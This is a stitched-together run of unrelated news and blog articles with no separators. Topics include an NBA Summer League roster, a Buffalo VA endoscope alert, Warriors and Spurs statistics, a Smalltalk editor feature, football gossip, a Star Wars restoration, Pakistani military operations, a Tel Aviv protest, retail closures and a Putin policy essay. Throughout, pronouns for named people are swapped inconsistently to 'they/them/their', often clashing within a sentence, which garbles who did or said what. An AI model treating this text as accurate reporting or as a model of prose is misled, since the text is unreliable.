A 25-year-old swingman who's got two years of NBA experience under their belt, Murry appeared in four games with the Washington Wizards on two 10-day contracts last year, before getting hurt and dumped in favor of Will Bynum. Out of all the players on this roster, Murry has one of the best shots to make the team.
In 56 career NBA games with the Knicks, Jazz and Wizards, he's shot 41.5% from 3-point range and showed some positional versatility. The Wizards obviously liked them enough to give them a shot on the main roster last year, so they should at least be a safe bet to make it to training camp.
Another familiar face, forward Damion James, is also named on the roster after making a run at the Wizards' 15th roster spot in last year's training camp.
An athletic 27-year-old small forward known for their defense and athleticism, and not their offensive game, James has 39 games of NBA experience on their resume with the Nets and Spurs.
Although they failed to beat out Rasual Butler last year, they have a bit of history with this team already and he'll get a long look.
The Wizards also have two other players with NBA experience on their Summer League roster.
Shooting guard Orlando Johnson spent two years in the league with the Pacers and Kings – they shot 38% from long range with Indiana in the 2012-13 season.
Point guard Scott Machado was an assist machine at Iona College before playing 11 games with the Rockets and Warriors in the 2012-13 season. As ready-made NBA vets, Johnson and Machado should see a lot of time on the court in Vegas.
If you watched the Washington Wizards in Vegas last year, you'll remember former Marquette forward Jamil Wilson, who is back for their second straight year on the Wizards' Summer League roster.
Wilson was one of the Wizards' best players in Vegas in 2014, impressing most of all with their ability to hit the corner three. The Wizards didn't invite them to camp, however, and after they were cut by the Suns they spent most of the year in the D-League.
All the rest of the players in the running for Vegas are undrafted rookies, and out of all the names on the roster, the one I was most excited to see was former St. Joe's big man Halil Kanacevic. You ever see Kyle Anderson play? Well, let's add about 50 pounds and put them at point-center. That's Halil Kanacevic. He's Unathletic LeBron.
They score, hits the boards, passes and handles the ball with ease, hits threes, the whole nine yards. They were my favorite college basketball player of the 2013-14 season, and he's with the Wizards after spending their first pro season in Italy and Slovenia. The guy can put up all kinds of wacky scorelines: 5-10-10, 26-17-4, 9-15-12, 12-11-8, 7-10-7, 19-13-6. All that, and they never put up a triple-double in college! I'm so hyped for the Kanacevic Era.
One of the more recognizable players on the 16-man roster is Traevon Jackson, who was Wisconsin's starting point guard last season before an injury forced them to come off the bench during the Badgers' run to the NCAA title game.
Jackson's a talented, physical guard whose collegiate career was curtailed by wild inconsistency, a big senior year regression, and a tendency to get wayyyyyyy out of control. He'll bring the fun.
Another interesting name is Quinnipiac's Ousmane Drame, a hard-working forward from Guinea who averaged 15 points, 11 rebounds and 3 blocks last season, their second consecutive year averaging a double-double.
Drame could end up being this year's Khem Birch, the guy who catches everyone's eye with their defense, hustle and rebounding (and then makes us all really sad when the Wizards fail to hang onto them somehow.)
College basketball fans might remember former Ohio State starter LaQuinton Ross, a shoot-first swingman who averaged 15 points for the Buckeyes in 2013-14 before imprudently forgoing their senior season to enter the draft.
They spent last year getting buckets with VL Pesaro in Italy.
The Wizards have also brought in guard Scott Suggs, a 3-point marksman from the University of Washington who spent last year in France, and forward Shawn Jones, who averaged 13 points a game with Sioux Falls in the D-League last season.
Rounding out the roster is a pair of 7-footers: 26-year-old basketball nomad Jarrid Famous and rookie Jaleel Roberts, an intriguing kid from UNC-Asheville who didn't start but still averaged 2.6 blocks per game in 2014-15. Keep an eye on Roberts, a raw player who could end up being a late-bloomer.
And that's the group.
If last year was any indication, it's gonna be a real fun Summer League. Come July 10, let's all sit back, relax, and enjoy some consequence-free offseason basketball.
Rep. Brian Higgins says they are posing questions to Veterans Affairs officials about an alert to more than 500 patients at the Buffalo Veterans Affairs Medical Center who underwent procedures with medical scopes.
"Anything that compromises the health and safety of those who so bravely served is extremely troubling," Higgins, D-Buffalo, said in a statement.
"We will ask for more details, await the results of the ongoing investigation, and will work with the Buffalo VA to see that our nation's duty to properly care for our veterans is met," they said.
Rep. Chris Collins, R-Clarence, also called the revelation "troubling." They encouraged veterans in their district who may be concerned to contact their district office for assistance.
"It is completely unacceptable that proper protocols were not being followed, but I applaud the actions taken to relieve the employee at fault from their duties," they said in a statement.
The hospital acknowledged this week that it is notifying 526 patients that the use of an improperly cleaned medical scope may have put them at risk of infection.
During a recent review of the disinfection process for the reusable equipment generally known as endoscopes, it was noted that steps in the manufacturer's instructions may not have been followed in some cases by an employee of the hospital, the medical center said in a statement. Hospital officials characterized the risk of infection as "very low," and announced they will offer screening to the patients at no charge.
Concerns around inadequately cleaned medical scopes usually revolves around the transmission of such illnesses as hepatitis C and HIV. "Notification does not mean veterans were infected," medical center officials said in a brief statement on Wednesday.
The VA declined to offer any additional information — including what type of procedure the patients received, the brand of medical scope, and, initially, over what time period. The medical center also declined to say when or exactly how the issue was discovered, how many scopes were involved, or what steps in the cleaning process were not followed.
For years, there has been increasing concern about infections linked to endoscopes, the flexible, lighted tubes that doctors use to peer inside patients' bodies. The devices can be difficult to clean, and require strict adherence to steps to remove organic residues and prepare for reuse in another patient.
Outbreaks have been associated with a number of different medical scopes, including duodenoscopes threaded into the top of the small intestine, gastroscopes passed into the stomach, colonoscopes inserted into the rectum to view the large intestine, and bronchoscopes to view the airways.
“Unfortunately, this is not the first time this type of negligence has occurred, yet is an example of how important our reforms have been, especially when it comes to holding VA employees accountable," said Collins, who cited legislation they have supported related to the operation of the Veterans Administration.
As the postseason heats up and a heavyweight clash between the Warriors and Spurs becomes more likely, I wanted to do a post that contrasts how these two teams win. But before highlighting how they're different, I wanted to visualize how ridiculously dominant they were during the regular season. Both finished near the top all-time in multiple team season statistics including MOV, SRS, Net Rating, and Adjusted Net Rating. I've charted these stats along with a “Meta Score” (which is simply the geometric mean of these stats along with wins) for the '16 Warriors and Spurs against the averages for the NBA Finals champions from 1986-2015. As you can see, both teams are well above what an average champion would look like.
The Warriors and Spurs dominance has been evident since late December, but it bears repeating: these were (probably) two of the top 5 regular season teams we've seen in the last 30 years. Yet with that said, what's even more interesting to me is that they dominated in completely opposite ways.
THE KATYUSHA VS THE TANK
A lot's been written on this topic, and while this list isn't comprehensive, for this post I'll highlight three major differences:
Offense vs Defense: the Warriors were first in the league in offensive efficiency (as well as assists, effective field goal percentage, three pointers, and almost every other shooting metric) and were (arguably) the greatest offense of all time. And while the Spurs were no slouch on the offensive end (they were 3rd in offensive efficiency), their defense led the league in efficiency along with several other defensive shooting statistics.
Pace: The Warriors played at the second fastest pace (101.6) while the Spurs were tied for fourth slowest (95.7).
Starters vs Bench: The Warriors' combination of Draymond Green and Steph Curry was (statistically) the best 1-2 punch in the league this year, leading all player pairs in terms of Real Plus Minus, Win Shares, and Box Plus Minus (even compared to Westbrook and Durant). But unlike the Thunder, the rest of the starters weren't slouches as you can see below:
The Warriors starting lineup had a Net Rating of 15.4 which led the league. And while the Spurs starters posted the 2nd best Net Rating at 12.4, as 538 pointed out, their bench played at the level of a solid playoff team.
Manu Ginobli and company posted a Net Rating of 10.9, which was 3.9 points better than the 2nd best bench (Raptors at 7.0) and 5.8 points better than the Warriors bench (5.1, which was 3rd in the league). In fact, the Spurs' 10.9 was better than the Thunder's starters (9.9), the NBA's 3rd best starting unit.
I've tried to visualize this difference in one chart by looking at average in-game point differential. Now you may be asking “what the hell is average in-game point differential?” On average, the Warriors scored 114.89 points per game and their opponents scored 104.13, which translates to an average margin of victory (or average point differential) of 10.76; for the Spurs, these numbers were 103.54, 92.90, and 10.64.
While both teams had different winning strategies, the outcomes (at least in terms of average margin of victory or MOV) were pretty similar; they both won by a little over 10.5 points per game. But we don't need to limit average point differential to end of game. We can look at it in-game as well. For example, here's the MOV after each quarter for both teams:
As you can see above, differences emerge when you look in game (for example: the first quarter), and they become more stark when you look at MOV for each second of the game.
I think the above chart does a good job visualizing the differences in how these teams win. The Warriors generally control the 1st quarter, as their league-best starters come out raining hellfire, and once the 2nd quarter starts, the Warriors are up by a comfortable amount. And not only are the Warriors good at getting a lead, but they're one of the best teams ever at keeping them; until their loss to the Timberwolves on April 5th, they'd won an NBA-record 114 straight games when they were up by 15 or more.
The Spurs path is different. Their separation starts about halfway through the first quarter as their bench units enter the game, and from midway of the 1st to the beginning of the 4th, their average MOV climbs from 0.62 to 8.63 as their bench thrashes the other team's 2nd unit and their slow pace and stifling defense slowly grind their opponents into dust.
In a way, these two teams remind me of different types of military weaponry. The Warriors open up and rain points on their opponents like the WW2 Soviet Katyusha,
(sans the mass-scale murder)
while the Spurs methodically grind you like a tank.
How the Memphis Grizzlies probably feel
While both look and behave differently, I wouldn't want to be on the receiving end of either (and if you're saying to yourself “Did this guy just reference in-game margin of victory and World War II weaponry in the same post?”, the answer is yes).
THIS IS POTENTIALLY ONCE A GENERATION EVENT
Anyway, while the Warriors and Spurs have nearly diametrically opposed strategies for success, they both work: these two campaigns are probably two of the top 5 regular seasons of all time of the last 30 years (not to mention, the Warriors and Spurs did this while shouldering the 1st and 4th toughest road schedules in the NBA). So when I finished up this post, I couldn't help but wonder, how often do you get two teams this good in the same season? There have been 877 seasons since 1985, so if you agree that the Warriors and Spurs had two of the top 8 regular seasons of the last 30 years, that means both teams are One-Percenters. I ran 10,000 simulations to get a sense of how often you'd have two (or more) 1% teams in a given season, and I found this occurred 3.4% of the time. In other words, we would only expect two teams of this calibre in the same season once every 30 years.
Assuming Steph's able to return to 100%, and both teams take care of their 2nd round matchups (knock on wood!), I've never anticipated a non-Chicago non-championship series so intensely in my life as this potential Western Conference Finals. You would have two all-time great teams playing nearly opposite styles backed by strong organizations and led by great coaches. If this comes to pass, I'm going to be like a #basic millennial betch listening to Beyonce's Lemonade: literally dyyiinng.
APPENDIX A: TOP 10 TEAMS SINCE 1986 BY REGULAR SEASON META SCORE
I wanted to see who were the top 10 teams of the last 30 years based on this meta score, and those results are below. At least one of the Spurs or Warriors will end the season with the ignominious title of “Best Non-Championship Squad” (currently held by the '09 Cavs … sorry Cleveland).
APPENDIX B: TEAM RATINGS
I use abbreviations for team statistics, and just in case you wanted to know more about what those mean, I've listed brief definitions below.
MOV (Margin of Victory): This is a team's average point differential (average points they scored minus average points they give up).
SRS (Simple Rating System): This is MOV adjusted for strength of schedule (more explanation here).
Net Rating: this is an estimate of point differential per 100 possessions. This metric will improve for slower paced teams like this year's Spurs- although the Spurs had a lower MOV than the Warriors, this is partly because they played at a slower pace, and in fact, had a distinctly higher Net Rating.
Adjusted Net Rating: This is net rating adjusted for team strength (similar to how SRS is adjusted MOV).
Advertisements
Improving the print-it support in GTPlayground
Print it is one of the actions that exists since ancient times in Smalltalk environments. A while ago, we enhanced the GTPlayground with a Print It actions that does not affect the existing code. Unlike in the classic behavior in which the printout gets inserted in the code editor, the improved version pops it up in a separate floating morph.
While this worked fine for most coding cases, every once in a while people reported the need to paste the printout in the text editor - hence the exact opposite the new solution tried to mitigate. To accommodate this use case Andrei and I made it so that you can now simply press Enter while the popping morph shows the printout and the text gets inserted in the editor.
But, there are two tiny details that come with the new version.
When no text is selected and you print, like in any Smalltalk environment, the whole like will be evaluated and printed. However, unlike other environments, the line will only be highlighted. This is a new mechanism that we introduced and that applies to any other commands as well (like evaluating or inspecting), and it is useful to provide a visual feedback to the user of what was actually executed. As opposed to selection the highlight has no influence on editing - in fact, it disappears as soon as you type anything.
When a selection does exist, the highlight is added on top. With this mechanism, when existing the popper widget via Esc or Backspace, only the highlight gets erased, and the exact editor state is restored to how it was before printing.
The other tiny detail is that when you press Enter, the text gets pasted as a comment. In this way, the syntax highlight does not get affected.
It is interesting to notice how many variations there can be even in a small feature like the one mentioned above. Just because a certain solution resisted for decades, like in the case of print it, it does not mean it is the only one or even the best one. For this reason, it is our duty to explore variations and guide the search by having the developer experience in mind.
FOOTBALL GOSSIP
Canada are stepping up their efforts to convince Scott Arfield to play for them after their latest Scotland snub by using former Burnley star David Edgar to sound out the midfielder, whose dad was born in Toronto. (Sun)
Former Scotland manager Alex McLeish says they have rediscovered their passion for the game after their managerial stint in Belgium with Racing Genk. (Herald)
Tom Boyd insists a Celtic treble would not be any less of an achievement because of the top-flight absence of Rangers (Various)
Scott Arfield has represented Scotland as far as under-21 level
Meanwhile the Parkhead club have accused the Scottish FA and rival clubs of taking advantage of their fans, claiming the £23 fans will have to pay for the North Stand at the Scottish Cup semi-final with Inverness is too high. (Various)
Hearts owner Ann Budge has set a minimum target of the top six next seasons when they return to the Scottish Premiership (Various)
Callum Paterson says the Tynecastle club will not take their foot off the gas against Rangers this weekend when the two clash at Ibrox, as they want to be the first club in 41 years to break the 100-goal mark in the second tier. (Daily Record)
Dundee manager Paul Hartley says they are keen to keep on-loan Hibs star Alex Harris at Dens Park (Daily Express)
Ex-Ibrox winger Neil McCann says it is "scandalous" the previous Rangers board sanctioned a deal that will see Newcastle pocket £500,000 if Rangers reach the Scottish Premiership. (Daily Star)
OTHER GOSSIP
Fight boss Alex Morrison is confident Commonwealth Games gold medallist Charlie Flynn will have no problem coping with the TV cameras when they take on Andy "thunder" Harris in their second bout of their professional career. (Herald)
Whether or not you see George Lucas' tinkering with the original Star Wars trilogy as harmless meddling or the greatest sin committed in cinematic history, it's a shame that fans don't even have the choice to purchase HD versions of the original theatrical cuts. But now, at least, a restored version of the first Star Wars is available online.
This isn't a “despecialized edition” like many other fan attempts to revert Lucas' changes. Somehow, a group of fans dubbing themselves Team Negative One found an original 35mm film print of the first Star Wars movie, and have spent years cleaning it up, scanning each frame of film and digitally restoring it to make the cleanest version of the original movie as possible. You can check out a video comparing the state of the original film reel and the final, cleaned version below:
Team Negative One's restoration is meant to be more faithful than the only publicly released HD version of the theatrical cuts made available as DVD bonuses in a 2006 release of the original trilogy (which themselves were taken from the Laserdisc release of the movies and suffered from detail loss in the transfer process). It's by no means a perfect restoration, with some graininess and color differences, and you won't get the sharp image of the Blu-ray releases, changes and all, but it's the closest there's ever been to a true restoration of the original Star Wars.
Advertisement
Due to the highly dubious legality of releasing the restoration, Negative One has remained relatively quiet about putting the restored film online; it began seeding its way through the internet about a month ago, but it's only just started receiving wider attention as more and more fans discover it. Obviously because of this, we can't directly link to where to download the restoration, but should you desire to see it, it's not exactly difficult to find if you go looking.
You can check out the link below to see more comparisons between the restoration and the original print, as well as the 2011 Blu-ray release of the film.
[StarWarsTrilogy.com via TheForce.Net]
Toronto FC's time in Bradenton, Florida is almost over.
The Reds have one more game in the IMG Suncoast Pro Classic on Saturday before returning to Toronto the following day.
Though their competition isn't a MLS Club —the Reds will face the u-23 Costa Rican national team— it will give the projected starting lineup one more chance to player in a competitive setting before the season opener in Vancouver on March 7th.
Thursday's training session culminated in a scrimmage between the starters and Toronto FC II, the club's USL squad.
The senior Reds prevailed 4-0. Thursday's training session began with head coach Greg Vanney instructing the starting XI as a unit. Tactically it appears the 4-2-3-1 formation that TFC began the preseason with could shift to a 4-3-3 or a 4-4-2. What was made clear during the scrimmage is that there will be flexibility.
Robbie Findley scored twice, while Jonathan Osorio and Sebastian Giovinco also added goals of their own.
Findley's opening goal was made possible by Warren Creavalle's superb cross. Osorio received the ball in the middle of the park before finding Creavalle streaking down the right wing. Though he's spent most of the preseason on the left, Osorio appeared to be used as a jack of all trades during the scrimmage.
Vanney and the coaching staff want to utilize the specific talents their squad offers.
“There's a lot of creativity on this team,” said Findley following training. “It's just putting those final pieces together to make sure everything is the way we want it to be."
Findley is clearly getting more comfortable with the tendencies of their new teammates, but that process is ongoing.
“It's come a long way,” Findley continued. “With this caliber of players it doesn't take too long to get on the same page and know what you have to do and know what your role is.”
Saturday's fixture will provide the starters one more opportunity to get real minutes in Florida.
Perquis settles in
Damien Perquis will be reunited with some familiar faces that he's missed quite a bit over the past month when they get back to Toronto on Sunday.
Perquis' wife and two children will greet them when they get back to the Big Smoke. The family plans to set up shop in Toronto, with the kids already enrolled in school.
The adjustment process to life on the road with their new teammates has been made easier by the presence of Benoit Cheyrou.
“I spend my [free] time with my new brother Benoit,” said Perquis while sporting a wide grin.
The Polish international is also spending time with their partner at the back, Steven Caldwell.
“We need to speak a lot because we play together,” they continued. The accent barrier is less fortified than it was a fortnight ago, but Perquis believes Caldwell is a little further ahead.
“I think it's easier for them to understand me, but day-by-day we're trying to understand each other more.”
Up next
The Reds will train on Friday in preperation for Saturday afternoon's fixture. Expect to see a starting lineup of Bendik; Creavalle, Perquis, Caldwell, Morrow; Bradley, Cheyrou, Osorio; Findley, Altidore, Giovinco.
DERA KHAN: At least 12 suspected militants and four security personnel were killed in an exchange of fire in Data Khel area of North Waziristan tribal region, according to an Inter-Services Public Relations (ISPR) statement.
The statement added that the militants fled from the scene leaving behind the bodies of three of their colleagues.
The details could not be independently verified.
North Waziristan is one of the seven regions in Pakistan's Federally Administered Tribal Areas (Fata) governed by tribal laws which is situated along the Pak-Afghan border and is rife with Taliban militant activity.
The Pakistan Army launched Zarb-i-Azb, a comprehensive operation in North Waziristan tribal region last summer to drive out Tehreek-i-Taliban Pakistan (TTP) and other extremist militants who launch attacks on government and civilian targets, a week after the brazen insurgent attack on the country's busiest airport in Karachi.
Read: Preliminary phase of Shawal operation successful: army
Chief of Army Staff, General Raheel Sharif, visited troops on Friday and said the initial phase around the surrounding peaks of the Shawal Valley was successful and it was now time to begin a final push into the lower areas.
“We will not stop unless we achieve our end objective of a terror-free Pakistan,” they said.
The tribal region, which borders with Afghanistan, has been used as a base by militants over the years. According to the ISPR, troops have been deployed along its border with neighbouring agencies to block any movement of terrorists in and out of the region.
Many militants have fled to other parts of Pakistan, and some into Afghanistan, complicating the US-backed Kabul government's fight against its own Taliban insurgency.
Almost two months after staging a huge end-of-summer demonstration in Tel Aviv, the social protesters will be returning to the streets Saturday night.
Protest leaders are hoping they can once again draw tens of thousands of people to the main demonstration, in Tel Aviv's Rabin Square. Smaller events will take place simultaneously in Kiryat Shmona, Haifa, Hod Hasharon, Rishon Letzion, Modi'in, Jerusalem, Be'er Sheva and Eilat.
Demonstration in Tel Aviv, Saturday, January 15, 2011. Tal Cohen
The Tel Aviv demonstration will begin at 8 P.M. with a march starting from Habima Theater. The main rally has been called for 9 P.M.
In an interview appearing in Friday's Week's End section, one of the protest leaders, Stav Shaffir, voiced confidence that the demonstration would be a success. "More than ever before, we need to hit the streets to prove we won't be stopped if change doesn't happen. Such a large protest movement is a one-time occurrence. I don't know when an opportunity like this will come again, so we cannot afford to miss it."
They also lashed out at Prime Minister Benjamin Netanyahu. "Bibi proved that they are not brave enough to look the people straight in the eye. From the very beginning of the protests, they never looked us in the eye ... They had plenty of opportunities, but nothing happened.
"He needs to understand that it's either do something or get out of the way," they said.
The main speaker at the Tel Aviv rally will once again be Daphni Leef, the woman who launched the protest. Other speakers will include a teacher employed via a manpower agency, a doctor and someone from the ultra-Orthodox community.
Keep updated: Sign up to our newsletter Email * Please enter a valid email address Sign up Please wait… Thank you for signing up. We've got more newsletters we think you'll find interesting. Click here Oops. Something went wrong. Please try again later. Try again Thank you, The email address you have provided is already registered. Close
The comedy team The Cameri Quintet, reuniting for the first time in 14 years, will perform a skit at the rally that was written specially for the event by author Etgar Keret. Singer Rami Fortis will also perform.
But the event could be undermined by a growing rift between the protest leaders and the National Student Union. This will be the first rally the student union did not help organize, and union chairperson Itzik Shmuli said they consider it superfluous and thinks the protesters' energies should now be funneled into other channels.
Nevertheless, they urged the public to attend the demonstration and said they plan to be there himself.
On Thursday, Shmuli asked the organizers to let them speak at the rally, but they refused, saying it wasn't reasonable to give a platform to someone who opposed the event and didn't help organize it. But they said they still plan to attend, adding that the media focus on the rift between them and the other protest leaders was excessive and harmful to the movement.
Protest leaders have been making intensive efforts in recent days to get the crowds to turn out, from hanging posters and working the social media to sending activists to cafes and restaurants in Tel Aviv to urge people personally to go out and demonstrate.
On Thursday, the Tel Aviv municipality rejected the protesters' request that it waive the fee it charges for using Rabin Square. Based on the organizers' permit application, which asked police to prepare for a crowd of 100,000, the city is asking for NIS 35,000, plus a NIS 10,000 deposits to cover any potential damage. But the protest leaders said they have no intention of paying the fee.
Starting from 10 A.M. on Saturday, parking will be forbidden on the streets leading to Rabin Square. In the evening, police will close off several main roads in the area, including parts of Arlosoroff, Ben-Gurion, Gordon, Dizengoff, Hanevi'im, Ben Zion, Shaul Hamelech, Kaplan, Hahashmonaim and Ibn Gvirol streets. And shortly before the rally, depending on the volume of traffic, they may also close four exits from the Ayalon freeway - Hashalom, Arlosoroff, Hahalacha and Rokach - as well as Rothschild Boulevard and Carlebach Street.
The Haifa demonstration will take place at the Sieff Center in Neveh Sha'anan. However, no streets will be closed in that city.
Revital Hovel contributed to this report.
Nam Y. Huh/Associated Press
Chicago Bulls guard Dwyane Wade returned to full-contact practice Wednesday and may wind up returning before the end of the season despite previously being ruled out.
"He went through part of the contact in practice today and they looked good," Bulls coach Fred Hoiberg told reporters. "Guys were out there—a good, spirited workout. Dwyane was able to participate in a lot of the contact drills. The big thing for them right now is getting their conditioning and wind and timing back, but it was great to see them out there and part of our scrimmage."
According to Vincent Goodwill of CSN Chicago, Wade plans to play on Saturday against the Brooklyn Nets.
Wade, 35, suffered a fractured elbow in a March 15 game against the Memphis Grizzlies. The team initially announced they would miss the remainder of the regular season with the injury.
Chicago is tied with the Indiana Pacers for seventh in the Eastern Conference, though it holds a tiebreaker. The Miami Heat are ninth in the conference but tied with the Bulls and Pacers in the loss column. The final handful of games remaining this season will determine which of the three winds up watching the postseason from home.
Wade is in their first season with their hometown Bulls after leaving the Heat in free agency. There's little doubt that preventing a Miami playoff berth plays some part in their desire to come back before the end of the regular season. Bulls star Jimmy Butler, who has been sensational since Wade has been out, said it's "easier" when their co-star is on the floor.
"He says that they feel good," Butler said. "Which he's supposed to say because they want to come back and play. I don't want them to hurry back and re-injure it or make it worse, but I want them out there on the floor, so it's kind of a 'I want you back, but I don't want you to jeopardize anything.'
"But they were out there today. ... It's easier when he's out there. It's easy whenever he's out there. They make my job a lot easier, along with everybody else's. It's just good to have him, their presence out there. That's bigger than what they do on the floor. Just having them out there with us."
Hoiberg has already ruled them out of Thursday's game against the Philadelphia 76ers.
Jean Twenge is a psychology professor at San Diego State University, a co-author of "The Narcissism Epidemic" and the author of "Generation Me."
If you have a thought you'd like to share, it's no longer necessary to wait: Post it to Facebook or Twitter, and an audience is yours in an instant.
Narcissism clearly leads to more social media use, social media use leads to positive self-views, and people who need a self-esteem boost turn to social media.
Is this ability making us narcissistic – overly focused on ourselves, with an outsized vision of our own influence? As Keith Campbell and I document in "The Narcissism Epidemic," narcissism is rampant in our current culture, from plastic surgery to reality TV to young people's rising narcissism scores. But is social media the cause?
It might be. Many studies find that narcissists have more friends on Facebook and post more, especially provocative material. They also post more often on Twitter. Apparently, narcissists thrive on social media. As one paper concluded, narcissists use Twitter “as a kind of technologically augmented megaphone: A means of amplifying one's own perceived superiority to others.” They use Facebook as “a technologically enhanced mirror, reflecting a preoccupation with one's own image, others' reactions to this image, and a desire to update the image as frequently as possible.”
But does social media use actually cause narcissism? For that, you need an experiment – a random assignment to spend time on social media vs. another site. Two experiments show that spending time on Facebook caused higher self-esteem, while using MySpace (but not Facebook) caused higher narcissism. In another experiment, those who received a blow to their egos were more likely to want to use Facebook.
In sum: Narcissism clearly leads to more social media use, social media use leads to positive self-views, and people who need a self-esteem boost turn to social media. It is less clear whether social media directly causes narcissism, at least in the short term. With narcissists having more friends and posting more frequently, however, social media sites are clearly influenced by those high in narcissism at a rate higher than their fair share. And that's just the way they like it.
It's not even half over, and 2017 has already been a year for the record books for traditional retailers. Just not in the way they would like.
National brands like J.C. Penney (jcp), Macy's (m), and Sears (shld) kicked off the year by reporting awful holiday season results—and then announcing hundreds of store closings. Big names from Ralph Lauren (rl) to Staples (spls) followed suit, bringing the number of national chains' store closings to a whopping 2,770 as of mid-May. Credit Suisse in April forecast that 2017 would see the highest number of closures since the Great Recession.
Then there are the bank­ruptcies, including once-vibrant chains like the Limited, Payless ShoeSource, and RadioShack. As of early May, S&P Global Market Intelligence tallied a record 18 retail bankruptcies, al­ready matching the total for all of 2016. The carnage is on full display in the new Fortune 500 list: Household names like Macy's, Sears, and Kohl's all took tumbles down the list, as did other struggling chains like GameStop (gme) (falling 19 spots, to 321) and Dillard's (dds) (which fell 37, to 417).
Symptoms of an industry-wide meltdown? Well, not exactly. Retail industry spending in the first four months of the year rose 3.6% compared with the same period in 2016, according to Department of Commerce data. The National Retail Federation expects that growth to pick up even more this year, thanks to low unemployment and a strong stock market.
But the way consumers spend has changed, perhaps irrevocably. And for stores that can't adapt, there's likely to be more pain ahead.
Nicolas Rapp
One of the biggest problems is shoppers' discount addiction. The rise of Amazon (amzn) and of smartphones as shopping tools has pitted retailers against one another in a never-ending price war and put unbearable pressure on the least capable outlets.
The shift online has also meant less need for America's sprawling malls and megastores. The U.S. has almost twice the retail square footage per capita of Europe, creating unsustainable oceans of store space. Just as bad? Many retailers' supply chains are out of date, leaving them unable to keep up with consumers' fast-changing and localized tastes.
A closer look at the chaos, however, will show that the companies hurting worst have a lot in common: A disproportionate amount of the suffering has afflicted apparel chains and department stores, many of which are selling undifferentiated products (basic T-shirts and jeans for everyone!). Chains that were scooped up during the recession by private equity firms, and loaded with crippling debt loads, were also hard hit. (Looking at you, Neiman Marcus.) It's difficult for these companies to pay interest expenses, let alone invest in e-commerce or improve their stores.
But despite the dour headlines, some retailers are doing quite well—Walmart, Home Depot (hd), Costco (cost), T.J. Maxx (tjx), and Best Buy (bby) among them. These companies have evolved with consumers, remaking their stores, while creating robust e-commerce platforms. Walmart (wmt), for instance, offers discounts on online orders if they're picked up in-store—encouraging “add-on” shopping. And Best Buy is reinventing itself as a place to get expert advice on smart homes and more sophisticated services.
Make no mistake, many large national chains face grim futures. But look beyond clothing chains and department stores and you'll see a pretty healthy industry. What seems like a retail-pocalypse is really a shift in where and how consumers shop. “Retail has gone through periods of creative destruction before,” says Joel Bines, a managing director at consulting firm AlixPartners. In the end, the companies left standing may emerge stronger than ever.
A version of this article appears in the June 15, 2017 issue of Fortune.
A more world-weary and mistrustful Vladimir Putin appears set to return to Russia's presidency in polls slated for next Sunday.
Mr. Putin's hardening suspicions toward the West in general, and the US in particular, are on full display in the latest of the lengthy policy manifestos that have comprised the main substance of their campaign over the past two months.
In this one, a 6,060 word missive published in the state-owned weekly Moskovskiye Novosti yesterday, they lay out a foreign policy vision that suggests a fresh chill in US-Russia relations may follow their return to the Kremlin. Already Moscow is moving to block Western initiatives in the Middle East, drawing a tougher line on US plans to install an anti-missile shield in Europe, and seeking to strengthen ties with the East, especially China.
Their main foreign policy concern is that Russia is being encircled by NATO expansion into former Soviet territory and its strategic nuclear deterrent is threatened by US missile defense plans.
"It seems that NATO countries, and especially the United States, have developed a peculiar understanding of security which is fundamentally different from our view," Putin writes. "The Americans are obsessed with the idea of securing absolute invulnerability for themselves, which, incidentally, is a utopia, for both technological and geopolitical reasons. But that is exactly where the root of the problem lies…. Absolute invulnerability for one nation would mean absolute vulnerability for everybody else."
A domestic crackdown on foreign-funded nongovernment organizations and a politically active civil society could also be in the cards, some experts warn, as Putin reiterates accusations that Western powers are using such groups for "political engineering" in Russia and other countries.
"If we take each of the points in this long article one-by-one, we won't find anything new. But taken together, in combination, this article acquires a straightforward anti-American sense," says Dmitry Suslov, an expert with the Council on Foreign and Defense Policies, a leading Moscow think tank.
"This is deeply concerning, since it creates the impression that chances for improvement in US-Russian relations will diminish [after Putin is elected]. Putin is clearly disillusioned with the US, even angry at it… in their view America is to blame for everything that's going wrong in the world today, even terrorism, and Russia must prepare itself to act as a counterbalance to the US," they add.
Defying the 'itch for military intervention'
Putin argues that Russia wants to be part of the global order, "but everything we do will be based on our own interests and goals, not on decisions other countries impose on us. Russia is only treated with respect when it is strong and stands firm on its own two feet.… Russia will call a spade a spade.… We have presented our arguments more than once. But unfortunately our Western partners ignore and dismiss them."
Exhibit A, in Putin's view, is the way Western pro-democracy meddling in countries affected by the Arab Spring revolts, particularly Libya, resulted in more bloodshed and the victory of intolerant forces. Though Russians initially sympathized with the aspirations of Arabs, they write, "it soon became clear that events in many countries were not following a civilized scenario. Instead of asserting democracy and protecting the rights of the minority, attempts were being made to depose an enemy and to stage a coup, which only resulted in the replacement of one dominant force with another even more aggressive dominant force."
This is why, after acquiescing to Western intervention in Libya, Russia has drawn the line at any international involvement in Syria's increasingly civil war-like crisis.
"Sadder but wiser, we oppose the adoption of UN Security Council resolutions that may be interpreted as a signal to armed interference in Syria's domestic development," Putin writes. "The logic of such conduct is counterproductive and very dangerous. No good can come of it.… I cannot understand what causes this itch for military intervention."
Putin also claims that Western-sponsored regime changes always lead to anti-Russian outcomes. "It appears that with the Arab Spring countries, as with Iraq, Russian companies are losing their decades-long positions in local commercial markets and are being deprived of large commercial contracts," Putin argues. "The niches thus vacated are being filled by the economic operatives of the states that had a hand in the change of the ruling regime."
Worse could be coming if trouble erupts in the Persian Gulf, they continue. "Russia is worried about the growing threat of a military strike against Iran. If this happens, the consequences will be disastrous. It is impossible to imagine the true scope of this turn of events," Putin adds.
Blocking US interference in Russia
In seven articles since the election campaign began, Putin has outlined, among other things, their plans to reform Russia's troubled political system, to combat the scourge of nationalism, solve Russia's galloping demographic crisis, and rebuild a world-class military machine.
Though there is nothing new in Russia's objections to the Pentagon's missile defense schemes, some experts detect a change of tone that suggests Putin will link any chance of future cooperation to US concessions on this matter.
"Putin says, indirectly, that no red line has yet been crossed and it's still possible to improve relations. But the US must stop insisting on deployment of an anti-missile system in Europe" as the price, says Alexander Konovalov, president of the independent Institute for Strategic Assessments in Moscow.
"Connecting all possible progress in international relations with the anti-missile issue is somewhat surprising. Even Russian cooperation in Afghanistan, where NATO is clearly fighting for Russian interests, appears to get linked to the anti-missile system."
Some experts also see worrisome domestic implications in Putin's attack on the role of what they call "pseudo-NGOs," which they accuse of aiming to exploit internal difficulties and promote revolution. In December, as a protest movement against electoral fraud began to take to the streets of Russian cities, Putin alleged they were acting on orders from US Secretary of State Hillary Clinton.
"There must be a clear division between freedom of speech and normal political activity, on the one hand, and illegal instruments of 'soft power,' on the other," Putin writes. "The activities of 'pseudo-NGOs' and other agencies that try to destabilize other countries with outside support are unacceptable."
